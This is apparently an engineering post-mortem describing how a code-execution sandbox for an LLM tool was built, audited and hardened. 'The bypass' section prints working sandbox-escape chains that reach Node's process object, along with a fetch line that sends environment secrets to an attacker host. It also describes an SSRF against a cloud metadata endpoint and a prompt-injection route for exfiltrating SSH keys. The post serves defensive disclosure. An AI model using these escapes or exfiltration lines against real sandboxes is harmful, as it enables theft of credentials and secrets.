What if your AI assistant didn't just write code, but ran it, looked at what happened, and told you the answer?

That's the loop we wanted Directive's MCP server to close. The LLM generates a Directive module. It runs the module in a sandbox. The transcript comes back in chat – the facts, the logs, the errors – and the LLM uses observed behavior to refine its next answer. No "probably this works"; no "open a sandbox and check yourself"; just an answer grounded in what the code actually did.

To make that real we shipped @directive-run/sandbox. This is the post-mortem of building it, breaking it via a focused security audit, and shipping the hardening – all in 72 hours.

The shape of the problem

The MCP server already had tools that returned code: generate_module, get_example, fix_code. What it didn't have was a way to execute that code and return what happened. Without execution, the LLM is reasoning about static text – useful, but it can't tell whether a generated constraint actually fires, whether a derivation evaluates to the right value, whether await system.settle() resolves cleanly or hits a retry-backoff timeout.

So the goal: a single MCP tool, run_in_sandbox, that takes a Directive snippet and returns:

The captured console.log / console.warn / console.error lines.
The post-settle() facts snapshot (system.facts.$store.toObject()).
Each declared derivation's computed value (system.derive[key]).
Any errors – from the validator, the bundler, the runtime, or a wall-clock timeout.

Pair that with the existing playground_link tool that hands the user a clickable URL to edit in StackBlitz, and the LLM has two complementary primitives: show a user observed behavior in chat, or hand off an interactive editor.

Three layers, the naive way

A first-pass implementation has three layers that fall out of the requirements naturally:

A validator that refuses unsafe imports and identifiers. Built on ts-morph – walk the AST of each file, reject imports outside the @directive-run/* allowlist, reject free identifier references to process, require, fetch, eval, and friends.
A bundler that virtualizes the multi-file payload. Built on esbuild – pin every file in an in-memory plugin's resolve hook, mark @directive-run/* as external (Node's loader finds those in node_modules), top-level await enabled so await system.settle() works.
A worker_threads worker with resourceLimits. 32 MB heap, 16 MB code, 5-second wall-clock budget enforced by worker.terminate(). Capture console.* to a buffer, lift the runner's system binding onto a side-channel global so we can snapshot facts after the run completes.

This shipped as @directive-run/sandbox@0.1.0 on 2026-06-06. The MCP run_in_sandbox tool went out the same day in @directive-run/mcp@0.5.0. The playground page at directive.run/playground got a new DevTools panel that hits the same sandbox via an internal Next.js API route.

It worked. Demo videos felt magical. Then we did the audit.

The 5-lens audit

Before declaring a security-sensitive feature shipped, we run it through a multi-agent AE (architecture/expert) review – a pattern that's become standard for any feature whose README claims "this is the boundary." Five lenses, in parallel, each focused on a single perspective:

Security / red-team – write attack chains, not advisories. If you can't write the chain, mark it "needs investigation."
Architecture – is the component split right? Is the regex hack durable? What deploys does this assume?
Agent-UX – when the LLM sees the tool description and an error message, can it self-correct?
DX – can someone npm-install the package and integrate it in 15 minutes?
Domain-correctness – does the sandbox model Directive's runtime honestly, or does it lie about half the surface?

The reports came back with grades: D, B+, B-, B-, C+. The single D was for security – it came with three working exploit chains.

The bypass

The validator had a rule that read sensibly when you skimmed it:

Skip identifiers in property-access position. The module in createSystem({ module: counter }) is a property KEY, not a reference to Node's CJS module global. We don't want to false-positive on {module: x} patterns.

That rule was a total denylist bypass.

// Validator says: process is denied as a free identifier.
process.exit(0);  // rejected, no problem.

// But globalThis is allowed. And the second .process? Property
// position. Skipped. Combine the two:
globalThis.process.exit(0);  // worked. host died.

Three working chains, all stemming from the same skip:

// (1) Direct globalThis escape
globalThis.process.mainModule.require("node:fs").readFileSync("/etc/passwd");

// (2) Reflect.get smuggle (string literal as second arg)
const proc = Reflect.get(globalThis, "process");

// (3) Function constructor smuggle (.constructor on any value)
const F = ({}).constructor.constructor;
const proc = F("return process")();

Each one reached process, which on the Vercel API route surface meant any anonymous attacker could drain environment variables – OPENAI_API_KEY, VERCEL_*, DATABASE_URL – via globalThis.fetch(attacker, { body: JSON.stringify(globalThis.process.env) }). On the MCP local-trust surface, a malicious snippet from a prompt-injection in a doc the LLM had read could exfiltrate SSH keys.

The audit also caught:

SSRF via allowlisted packages. @directive-run/query calls fetch inside its own module body. The validator only sees user source. A snippet that did createBaseQuery({ baseUrl: "http://169.254.169.254" }) would hit AWS IMDS without ever touching fetch in user code.
No rate limit on the docs-site API route. Anonymous attacker fires 100 concurrent while(true){} snippets, drains the Vercel function quota. Same surface, denial-of-service flavor.
Temp-file location broke Vercel. The bundle was written inside the sandbox package's own node_modules directory so Node's resolver could walk up. Vercel and AWS Lambda ship read-only filesystems outside /tmp. The route looked deployable but the first execution attempt would have failed at mkdtempSync.
Two transcripts disagreed. result.facts correctly reflected the snapshot, but console.log("[start] facts:", system.facts) rendered as [start] facts: {} in the same response. JSON.stringify on the FactsStore proxy returned "{}". A confused user would assume the engine was broken.
Half the runtime was missing. result.facts covered only facts. Modules whose primary product is a derivation – isReady, status, total – returned a transcript that looked empty even though everything ran fine.

Twelve P0s total. Per-lens grades synthesized into docs/AE-AUDIT-SANDBOX.md along with a P1 backlog, P2 polish list, and an explicit threat-model coverage map.

The hotfix

The first commit went out same-day. The validator gained a dedicated checkPropertyAccessEscapes pass that closes the bypass class:

Reject any PropertyAccessExpression whose .name matches the deny-list.
Reject .constructor access on any value – there's no legitimate Directive use, and it's the Function-constructor smuggle vector.
Reject globalThis["X"] bracket access with a string literal, even when X is in the allowlist – there's no reason to reach allowlisted names via bracket syntax.
Reject bracket access whose literal matches a denied name on any receiver.
Reject Function(...) as a call expression (in addition to the existing new Function(...) denial).
Reject Reflect.get(globalThis, "X") / Reflect.has(globalThis, "X") / Object.getOwnPropertyDescriptor(globalThis, "X") when the second arg is a denied-name string literal.

17 PoC regression tests went in alongside the fix. Every chain from the audit doc has a test that proves it now fails. The "skip property-key in object literal" original false-positive case still passes – legitimate createSystem({ module: counter }) works.

The tool description got rewritten too. The original said the allowlist was @directive-run/{core, ai, query}. After the v0.2.0 widen, the actual allowlist had 16 packages. An LLM reading the description was prophylactically rejecting valid React/Vue/AI snippets because of the documentation lie.

That shipped within an hour.

The cleanup PR

The remaining four P0s took longer because they touched multiple files, but they were all on the same path: defense in depth around what worker_threads and a strict validator alone can't cover.

SSRF wrapper. The worker patches globalThis.fetch before importing the user's bundle. The wrapper rejects:

Loopback: 127.0.0.0/8, ::1, localhost.
Link-local: 169.254.0.0/16 – including the cloud metadata endpoint at .169.254.
RFC-1918 private: 10/8, 172.16-31/12, 192.168/16.
Multicast, reserved, carrier-grade NAT.
IPv4-mapped IPv6 in literal AND hex form (Node's URL parser normalizes ::ffff:169.254.169.254 to ::ffff:a9fe:a9fe).
Non-HTTP(S) protocols (file:, ftp:, data:, javascript:).

The validator already blocked fetch as a free identifier and as globalThis.fetch property access. The wrapper layer catches the case the validator can't see: @directive-run/query's internal fetch calls living inside the package's own module body.

Vercel-compatible temp-file location. The bundle now writes to os.tmpdir() first (Vercel-friendly), falls back to the package dir. The bundler resolves @directive-run/* imports to absolute file:// URLs via createRequire(import.meta.url).resolve(), so the worker can import the bundle from /tmp without needing a node_modules chain above it. AWS Lambda, Cloud Run, and Cloudflare Workers all inherit the fix.

Facts proxy serialization. captureConsole now detects Directive's facts proxy via the $store.toObject() and $snapshot() escape hatches, serializes the snapshot, falls back to JSON.stringify for non-Directive values. The log line and result.facts now agree.

Derivations in the snapshot. The host pre-extracts derivation key names from the source files via a brace-balanced scanner (handles both multi-line derive: {\n isReady: …\n} and compact derive: { isReady: … } forms). The worker iterates each via system.derive[key] after settle() and packs the values into result.derived. Modules whose primary product is a derivation now show it.

Rate limit + Origin check on the docs API route. Per-IP rate limit at 10 requests per 60-second window, max 3 concurrent in-flight per IP, Origin allowlist (directive.run, www.directive.run, localhost:3000/3001), Retry-After header on 429 responses. An in-memory Map for v1; Upstash KV is the upgrade path when sustained load justifies the dependency.

All five shipped to npm in @directive-run/sandbox@0.3.0 and @directive-run/mcp@0.5.2.

What you can actually do with this

After all of that, here's the loop the LLM gets to run today:

You:    "Build me a Directive counter that doubles in a derivation, then run it
         and tell me what doubled looks like after three bumps."

LLM:    [calls generate_module → counter module + runner]
        [calls run_in_sandbox with the paired files]

Sandbox responds:
  logs:    ["[log] [start] facts: {\"count\":0}",
            "[log] [settled] facts: {\"count\":3}"]
  facts:   { count: 3 }
  derived: { doubled: 6 }
  errors:  []

LLM:    "After three bumps, facts.count is 3 and the derivation doubled is 6.
         Here's the source. Want me to add a constraint that caps the count?
         [playground link]"

The doubled value comes from system.derive.doubled – which would have been invisible before the audit. The playgroundUrl in the response is the click-through to StackBlitz if the user wants to iterate live.

Try it now: ask Claude (with the @directive-run/mcp server installed) to "build a Directive traffic light and run it." Or paste a snippet into the playground and click Run. The transcript that comes back is what the sandbox saw.

The lessons we kept

Three pieces of this story moved into the team's cross-project recipe book:

"Skip the false-positive case" exemptions in security validators are footguns. The property-access skip was added to suppress one specific noise pattern. Without a regression test that proved the equivalent denied-name pattern in the same context still got rejected, the skip silently over-shot into a total bypass. The fix isn't "don't write skips" – it's "every skip needs a paired test that proves the denial it bypasses is still in force."
Run the security audit BEFORE the public deploy. We shipped to npm + Vercel before the audit, which meant the live /api/run-sandbox endpoint had an exploitable bypass for about 24 hours. The fix is procedural: any feature whose README claims "this is the boundary" gets a security-specific AE audit before it touches a public surface, not as a follow-on.
Tool descriptions can lie and the LLM has no way to know. The original description claimed the allowlist was three packages when the actual list was sixteen. The LLM was rejecting valid code because of documentation drift. When a single source of truth is duplicated to a description / README / changelog, build a runtime-emitted version – a getAllowedPackages() function the LLM can read via a meta-tool, so description and code can't drift.

The full audit document with per-lens grades, threat-model coverage, and the remaining P1/P2 backlog lives at docs/AE-AUDIT-SANDBOX.md in the directive monorepo. It's open – if you find a chain the regression tests don't cover, the issue tracker is at github.com/directive-run/directive.

What's next

The 12 P0s are all closed. Roughly 30 P1s remain – tagged error kinds for cleaner LLM routing, an AbortSignal parameter for cancellation, an XOR-discriminated RunInSandboxInput type so {source, files} together is a TS error, a runtime-emitted allowlist surface, the bundler's regex injectEarlyCapture swap to an AST rewrite. They're cataloged in the audit doc; none of them are exploitable in the way the P0s were.

Phase B – a proper threat-model page that explains "what we promise vs. what we don't" in plain English – is still pending. So is the validate_snippet MCP tool that lets the LLM check a snippet against the allowlist without actually executing it.

If you're using run_in_sandbox in a real workflow, we want to hear about it. What's the smallest case where the transcript saved you an iteration? What's the bug we still haven't caught? File an issue or message us. Same offer for anyone integrating @directive-run/sandbox directly into a CI gate, a teaching tool, or a hosted playground of your own – the package is shaped for those use cases too, and your feedback shapes the P1 prioritization.

Links:

@directive-run/sandbox – the npm package.
@directive-run/mcp – the MCP server with run_in_sandbox.
Sandbox docs – API reference + threat model.
Playground – the live UI.

Safe Snippet Execution for LLMs – Shipping @directive-run/sandbox

The shape of the problem

Three layers, the naive way

The 5-lens audit

The bypass

The hotfix

The cleanup PR

What you can actually do with this

The lessons we kept

What's next

Stay in the loop. Sign up for our newsletter.

Safe Snippet Execution for LLMs – Shipping @directive-run/sandbox

The shape of the problem

Three layers, the naive way

The 5-lens audit

The bypass

The cluster of related findings

The hotfix

The cleanup PR

What you can actually do with this

The lessons we kept

What's next

Stay in the loop. Sign up for our newsletter.